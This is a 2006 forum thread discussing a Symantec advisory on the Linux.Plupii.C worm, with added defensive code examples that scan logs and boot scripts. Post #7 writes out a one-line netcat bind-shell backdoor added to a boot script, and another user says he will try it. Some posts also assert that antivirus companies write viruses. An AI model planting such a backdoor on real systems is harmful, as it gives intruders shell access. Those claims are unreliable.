
A Linux Virus Discovered On 19th Feb


12 replies to this topic

#1 XIII

XIII

    Advanced Member

  • Members
  • 192 posts
  • Gender:Male
  • Location:Japan
  • Interests:Chess, Technical Analysis, Reading and Computing

Posted 05 March 2006 - 08:10 AM

Symantec just launched a warning about the detection of a Linux virus; this is the summary of it:

Linux.Plupii.C is a worm with back door capabilities that spreads by exploiting vulnerabilities.
Type: Worm
Infection Length: 40,7576 bytes
Systems Affected: Linux, Novell Netware, UNIX
Number of infections: 0 - 49
Number of sites: 0 - 2
Geographical distribution: Low
Threat containment: Easy
Removal: Easy

Technical Details:
When Linux.Plupii.C is executed, it performs the following actions:
1. Opens a back door on UDP port 27015, which enables a remote attacker to have unauthorized access to the compromised computer.
2. Generates IP addresses and uses them to build URLs which include the following strings:
   /cvs/
   /articles/mambo/
   /cvs/mambo/
   /blog/xmlrpc.php
   /blog/xmlsrv/xmlrpc.php
   /blogs/xmlsrv/xmlrpc.php
   /drupal/xmlrpc.php
   /phpgroupware/xmlrpc.php
   /wordpress/xmlrpc.php
   /xmlrpc/xmlrpc.php
3. Sends HTTP requests to the URLs it generates, and attempts to spread by exploiting the following Web server-related vulnerabilities:
   • The XML-RPC for PHP Remote Code Injection vulnerability (as described in Bugtraq ID 14088)
   • The AWStats Rawlog Plugin Logfile Parameter Input Validation Vulnerability (as described in Bugtraq ID 10950)
   • The Darryl Burgdorf Webhints Remote Command Execution Vulnerability (as described in Bugtraq ID 13930)
4. When the worm finds a vulnerable script on the compromised computer, it downloads and executes a malicious install script from the following Web site:
   [http://]198.170.105.69/[REMOVED]
5. Attempts to download the following files to the /tmp/.temp folder:
   • cb (Detected as Linux.Plupii.B)
   • https (A Perl script with IRC back door functionality.)
   • ping.txt (A Perl script that is a reverse shell back door.)
   • httpd
6. Attempts to connect to a predetermined IP address on TCP port 8080 and open a shell back door.
7. Opens an IRC back door, which attempts to connect on one of the following IRC servers:
   • eu.undernet.org
   • us.undernet.org
   • 195.204.1.130
   • 194.109.20.90
   The worm joins a channel that contains the following string and waits for commands from a remote attacker:
   lametrapchan

Source Article Published on Symantec Official Site on 25th Feb


To me, I think it's not that much of a threat, as we can see in its effects; if you have a very weak firewall it will stand against it. Also, you can notice it from the number of infections, though Symantec try to say it's a big danger; I think they want to get more sales :o

Edited by XIII, 05 March 2006 - 08:18 AM.
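
The URL strings in step 2 of the summary above give a web server operator something to look for in access logs. The following is an added example, not part of the original post or of Symantec's write-up: it flags clients that request several of the listed strings, since one request to /wordpress/xmlrpc.php is ordinary blog traffic while a sweep across unrelated application paths is not. The combined log format, the threshold of three and the sample log lines are assumptions.

```python
import re
from collections import defaultdict

# Probe strings exactly as listed in the advisory summary in the post above.
PROBE_STRINGS = [
    "/cvs/", "/articles/mambo/", "/cvs/mambo/",
    "/blog/xmlrpc.php", "/blog/xmlsrv/xmlrpc.php", "/blogs/xmlsrv/xmlrpc.php",
    "/drupal/xmlrpc.php", "/phpgroupware/xmlrpc.php",
    "/wordpress/xmlrpc.php", "/xmlrpc/xmlrpc.php",
]

# Common/combined log format: client - user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "\S+ (\S+)[^"]*" \d{3} ')

def probe_hits(path):
    """Return the listed probe strings contained in a request path."""
    path = path.split("?", 1)[0].lower()
    return {s for s in PROBE_STRINGS if s in path}

def find_scanners(lines, min_distinct=3):
    """Map client -> sorted probe strings, for clients hitting >= min_distinct.

    min_distinct is an assumed threshold: raise it on hosts that really serve
    one of these applications, lower it on hosts that serve none of them.
    """
    seen = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            seen[m.group(1)] |= probe_hits(m.group(2))
    return {ip: sorted(h) for ip, h in seen.items() if len(h) >= min_distinct}

# Constructed sample log lines (documentation-range addresses, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [05/Mar/2006:08:10:01 +0000] "POST /blog/xmlrpc.php HTTP/1.0" 404 210
192.0.2.10 - - [05/Mar/2006:08:10:01 +0000] "POST /drupal/xmlrpc.php HTTP/1.0" 404 210
192.0.2.10 - - [05/Mar/2006:08:10:02 +0000] "POST /phpgroupware/xmlrpc.php HTTP/1.0" 404 210
192.0.2.10 - - [05/Mar/2006:08:10:02 +0000] "GET /cvs/mambo/index.php HTTP/1.0" 404 210
198.51.100.7 - - [05/Mar/2006:08:11:40 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 512
198.51.100.7 - - [05/Mar/2006:08:12:03 +0000] "GET /index.html HTTP/1.1" 200 4096
""".splitlines()

if __name__ == "__main__":
    for ip, hits in find_scanners(SAMPLE_LOG).items():
        print(ip, "probed", len(hits), "listed paths:", ", ".join(hits))
```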


#2 Darren

Darren

    Premium Member

  • Members
  • 207 posts
  • Gender:Male
  • Location:Vic, Australia
  • Interests:Obviously computers and programing basics and computer games. Footy (Aussie rules [Best game in the world!!!]) and TV.

Posted 05 March 2006 - 11:48 AM

You can look at this two ways:
1) It's a relatively unimportant virus that is easy to block or remove.
2) While this virus isn't a big deal, it may be foreshadowing a lot more which may do more damage.

Personally I would go with option 2; however, it will take many years for a more damaging virus to be made. I also believe that Linux and Unix users are a lot more careful with their computers and have firewalls and don't do stupid things like download huge files that unknown people have sent to them (I know a couple of friends who have done that).

#3 yordan

yordan

    Way Out Of Control - You need a life :)

  • [MODERATOR]
  • 4,680 posts

Posted 05 March 2006 - 01:44 PM

A very important fact is that viruses now come infecting Linux systems. A while ago we knew that viruses were infecting only Microsoft systems. Now they start infecting Linux systems.

#4 nightfox

nightfox

    NiGHTFoX - Hiding in the dark

  • Members
  • 680 posts

Posted 05 March 2006 - 06:20 PM

A very important fact is that viruses now come infecting Linux systems. A while ago we knew that viruses were infecting only Microsoft systems. Now they start infecting Linux systems.

but aren't the viruses on Linux systems open source? lol. And, would the viruses have to be downloaded on ROOT account? Plus, they would have to be easy to remove unlike Windows viruses which attack vital system files & the registry.

[N]F

#5 qwijibow

qwijibow

    Way Out Of Control - You need a life :)

  • Members
  • 1,366 posts
  • Location:Nottingham England
  • Interests:Computer / nerd related things (who would have guessed), also the following cartoons: South Park, King of the hill, Family guy, Sponge Bob Square pants, Simpsons

Posted 05 March 2006 - 09:50 PM

A very important fact is that viruses now come infecting Linux systems. A while ago we knew that viruses were infecting only Microsoft systems. Now they start infecting Linux systems.


The first computer virus/worm spread by a buffer overflow in sendmail running on Unix systems.

People were writing bad code before Bill Gates even thought of starting Microsoft.

#6 XIII

XIII

    Advanced Member

  • Members
  • 192 posts
  • Gender:Male
  • Location:Japan
  • Interests:Chess, Technical Analysis, Reading and Computing

Posted 05 March 2006 - 09:56 PM

but aren't the viruses on Linux systems open source? lol. And, would the viruses have to be downloaded on ROOT account? Plus, they would have to be easy to remove unlike Windows viruses which attack vital system files & the registry.


I think the greatest threat in Linux viruses for now is to remove data or format /home or any other file that is permitted to be used by ordinary users, not root, or else to open ports for incoming connections so hackers could get into your machine. But as I said, that's for now; I think the problem will be in the future, when they could make a virus that can log off from an ordinary user and then log in again as root, delete all your files, open ports for hackers, steal your pc and run away :o

I don't like to save any important files on my pc; or else why did they invent backup systems, CDs, DVDs, zip disks or even flash memories?

#7 qwijibow

qwijibow

    Way Out Of Control - You need a life :)

  • Members
  • 1,366 posts
  • Location:Nottingham England
  • Interests:Computer / nerd related things (who would have guessed), also the following cartoons: South Park, King of the hill, Family guy, Sponge Bob Square pants, Simpsons

Posted 06 March 2006 - 05:05 AM

On a correctly configured server, this worm is pretty lame.

It does not attempt to exploit any privilege escalation exploits,

and is therefore limited in access to the privileges of the running, exploitable server.

Basically, it has just enough access to pass on the worm to another exploitable server.

This worm is basically an automated chain letter.

The threat level of very low given in the link on post one seems very accurate.

EDIT

I think the greatest threat in Linux viruses for now is to remove data or format /home or any other file that is permitted to be used by ordinary users, not root, or else to open ports for incoming connections so hackers could get into your machine. But as I said, that's for now; I think the problem will be in the future, when they could make a virus that can log off from an ordinary user and then log in again as root, delete all your files, open ports for hackers, steal your pc and run away



Linux rocks... it's so insanely configurable, and it's so easy to do anything.

For example... one could program a back-door *trojan* in a single line....


echo " nc -l 6666 -e /bin/bash" >> /etc/init.d/local

That code adds a line to the boot script that runs a command on every boot.

That command listens on port 6666, and forwards all information that arrives on port 6666 to bash... (the command line executor)
and in return, all bash output is sent back to the attacker via netcat.

Linux is very configurable...

and more and more computer illiterates are using Linux...

How easy would it be to fool a Linux newb into running the above command with root privileges... they don't know what it means.

Any Operating system is only as secure as the Admin makes it.

Security holes will always exist while less than perfect people hold the root password.
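
The line that command appends is easy to audit for once you know its shape: a netcat invocation that both listens and hands the connection to a program. The following is an added example, not code from the original post: it checks boot-script text for that pattern, skipping comments and unrelated netcat uses. The sample script and the extra path /etc/rc.local are assumptions; /etc/init.d/local is the file named in the post.

```python
import re
import shlex
from pathlib import Path

NETCAT_NAMES = {"nc", "netcat", "ncat"}

def is_exec_listener(command):
    """True if one command runs netcat listening (-l) with a program attached (-e/-c)."""
    try:
        tokens = shlex.split(command, comments=True)   # drops '# ...' comments
    except ValueError:                                  # unbalanced quotes
        tokens = command.split()
    for i, tok in enumerate(tokens):
        if Path(tok).name not in NETCAT_NAMES:
            continue
        args = tokens[i + 1:]
        long_opts = {a for a in args if a.startswith("--")}
        # Merge short flags so '-l -e', '-le' and '-lvp 6666 -e' all look alike.
        short = "".join(a[1:] for a in args if a.startswith("-") and a not in long_opts)
        listens = "l" in short or "--listen" in long_opts
        # -e/-c hand the connection to a program in traditional netcat and ncat.
        execs = bool(set("ec") & set(short)) or bool({"--exec", "--sh-exec"} & long_opts)
        if listens and execs:
            return True
    return False

def audit_script(text):
    """Return (line_number, stripped_line) for every line holding such a listener."""
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        # Check each command of a compound line (a; b && c | d) on its own.
        if any(is_exec_listener(part) for part in re.split(r"[;&|]+", line)):
            findings.append((number, line.strip()))
    return findings

# Constructed sample boot script; line 6 is the line the post's command appends.
SAMPLE_BOOT_SCRIPT = """\
#!/bin/sh
# local boot script (constructed sample)
/usr/sbin/ntpdate -s pool.example.org
# nc -l 6666 -e /bin/bash
echo -e "starting local services"
 nc -l 6666 -e /bin/bash
/usr/bin/nc -z 127.0.0.1 25 && logger -t local "mta ok"
"""

if __name__ == "__main__":
    # /etc/init.d/local is the file named in the post; /etc/rc.local is an assumed extra.
    for path in map(Path, ["/etc/init.d/local", "/etc/rc.local"]):
        if path.is_file():
            for number, line in audit_script(path.read_text(errors="replace")):
                print(f"{path}:{number}: {line}")
```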

#8 hatim

hatim

    Advanced Member

  • Members
  • 196 posts
  • Location:Topi,Swabi,NWFP,Pakistan
  • Interests:Linux,Unix,Open Source,Programming, C++,Java,PHP,Technology,News,General Knowldge,Travel

Posted 06 March 2006 - 03:33 PM

echo " nc -l 6666 -e /bin/bash" >> /etc/init.d/local


Neat stuff: will try it and see how it works ....

Yes, Linux is very configurable. But distros like Ubuntu make it hard for people to configure things without knowing what they are doing. Windows could also be very configurable but they choose not to.

In my opinion the code quality of Linux and Windows is comparable. The only difference is that whenever a bug comes out, anyone can correct it, whereas in MS it has to be Bob Smith (son of John Smith) who is on vacation in the Caribbean after he got a big bonus for adding glitter to the START button.

#9 XIII

XIII

    Advanced Member

  • Members
  • 192 posts
  • Gender:Male
  • Location:Japan
  • Interests:Chess, Technical Analysis, Reading and Computing

Posted 10 March 2006 - 06:36 AM

Neat stuff: will try it and see how it works ....

Yes, Linux is very configurable. But distros like Ubuntu make it hard for people to configure things without knowing what they are doing. Windows could also be very configurable but they choose not to.

In my opinion the code quality of Linux and Windows is comparable. The only difference is that whenever a bug comes out, anyone can correct it, whereas in MS it has to be Bob Smith (son of John Smith) who is on vacation in the Caribbean after he got a big bonus for adding glitter to the START button.


As qwijibow said, Linux rocks. If I have the power to change/configure whatever I want, why do you think I will limit myself to Windows and Microsoft products? Why do we just sit and cry every time we discover a bug, a hole or a virus? On Linux you will always have the power to solve it (depends on your knowledge); you don't need to wait for a technician to solve it for you, you don't need to wait till Bob Smith gets back to his work to solve it for you.
And by the way, who said Ubuntu makes it hard for people to configure things? I'm an Ubuntu user, I have used Linux for nearly a year, everything is configurable, really nothing hard. Even if you find something to be hard, just post it to the Ubuntu official forums and you will get an answer in a maximum of 3 hours.
I think Symantec tells us by this warning that they are into making Linux viruses, ooops, I meant anti-virus :o


#10 yordan

yordan

    Way Out Of Control - You need a life :)

  • [MODERATOR]
  • 4,680 posts

Posted 10 March 2006 - 11:47 AM

I think Symantec tells us by this warning that they are into making Linux viruses, ooops, I meant anti-virus


McAfee has had a version for Linux, as well as for AIX, for a long time.

#11 XIII

XIII

    Advanced Member

  • Members
  • 192 posts
  • Gender:Male
  • Location:Japan
  • Interests:Chess, Technical Analysis, Reading and Computing

Posted 11 March 2006 - 01:17 AM

McAfee has had a version for Linux, as well as for AIX, for a long time.


A version of the virus or anti-virus? :o
I wanted to say that most viruses come from anti-virus companies one way or another; they just try to keep producing their products. Tell me, what if virus coders (not Symantec, McAfee or any other company's coders) stopped making new viruses? As you know, from time to time you get a rest period from viruses, then you get a very dangerous one; it's the calm before the storm.
Anyway, most of these threats come from these companies; that's why I couldn't trust any of them. I always trust online scanning.
You can get your pc scanned for free online (that means it's an updated scan engine) on the PC-cillin official site; I think it's the best solution. When I was using McAfee or Norton, I used to update them every few days; sometimes they couldn't discover viruses that the online scan did. Since that time I stopped using them, and now it's much better without them. I scan my pc online regularly every 1-2 months, and now of course my pc is faster without these anti-virus processes running in the background. I don't need auto-protection; I didn't use to download untrusted files.
That online scan you can find here:

Online Scan

It scans for malware, grayware, adware... etc., any xxxxware you know or you don't :P
And one way or another you feel safer on Linux than Windows.


#12 kaputnik

kaputnik

    Premium Member

  • Members
  • 233 posts
  • Location:Bangalore

Posted 11 March 2006 - 07:35 AM

Linux viruses are not much heard about, and a major anti-virus firm coming out with a warning for Linux seems like a PR and/or scare tactic. Automatic installation and even remote installation of a malicious object in a Linux OS is fairly difficult. It is vital to have a firewall, whichever OS one's running, and for Linux users, who're much more involved with their systems and are generally more aware of the "computing" world around them, this is much of a given.

The thing with Linux users is that much of the software that is used is usually open source. This is of course very disturbing to companies manufacturing software, and especially so for anti-virus firms, since they have a cash cow in renewals itself. With huge swathes of users using Linux, especially the young, who adapt to Linux so very easily, the large companies of the world, non-OS producing (mainly the supporting software), are very worried by the trend.

As far as I can tell, the next few years will see a concerted effort to try the very foundations of Linux for its strength, much sponsored by large corporations. And Linux will evolve. Like it always has.

#13 KazDoran

KazDoran

    Member [ Level 1 ]

  • Members
  • 49 posts

Posted 11 March 2006 - 11:43 AM

Viruses/worms for Linux don't really surprise me, because there was bound to be some jerk around trying to do harm to other people using Linux someday, and the ever-increasing number of Linux users (especially those who really don't know much about using it, which is quite natural) makes Linux a particularly appealing target for viruses in the near future.

Linux viruses aren't unheard of, however... In my own opinion, things such as rootkits, which allow access to root through memory stack hacking and buffer overflow, should be classified as viruses, even if they're useful to some people who often forget or mistype their root passwords. Remember that a virus doesn't always have to self-propagate through various machines.


